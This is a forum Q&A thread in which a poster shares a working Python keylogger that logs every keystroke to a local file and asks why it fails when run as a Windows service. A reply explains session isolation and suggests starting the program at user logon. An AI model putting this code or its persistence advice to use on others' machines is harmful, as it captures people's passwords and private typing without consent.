Python executable when run not writing to .txt file on startup
I have a keylogger program which I converted to .exe using pyinstaller then I used NSSM (the Non-Sucking Service Manager) to run the file on startup. The file puts all the keys pressed in a .txt file; however, it doesn't work at all on startup. When I open Windows services the status is 'running' but I don't see the .txt file being updated. However, when I run the executable myself it works fine.
If anyone is wondering if I am stealing passwords with this than let me just tell you it's a project for my cyber-security course in university.
import os
from pynput import keyboard

# Set absolute path to the log file
log_file_path = r"F:\Coding\PYTHON-PRACTICE\keylogger\dist\keyfile.txt"

# Ensure the directory exists
os.makedirs(os.path.dirname(log_file_path), exist_ok=True)

# Function to log key presses
def keyPressed(key):
  with open(log_file_path, 'a') as logKey:
    try:
      char = key.char
      logKey.write(char)
    except AttributeError:
      logKey.write(f'[{str(key)}]')

if __name__ == "__main__":
  # Start the listener for key presses
  listener = keyboard.Listener(on_press=keyPressed)
  listener.start()
  listener.join()  # Keep the listener running


Tangentially, repeatedly opening and closing the file is going to make your code very slow.


I used NSSM (the Non-Sucking Service Manager) to run the file on startup. [...] When I open Windows services

NSSM evidently installs applications as Windows services. Windows services do not have access to the interactive session (the one someone is typing on a keyboard on), because they often start before such an interactive session even starts. (Also consider that a machine could have multiple interactive sessions, e.g. remote desktop ones.)

when I run the executable myself it works fine.

Because you're running it from within your interactive session.
Instead of setting up your program to run as a service, you would need it to start as a regular program when an user has logged on.
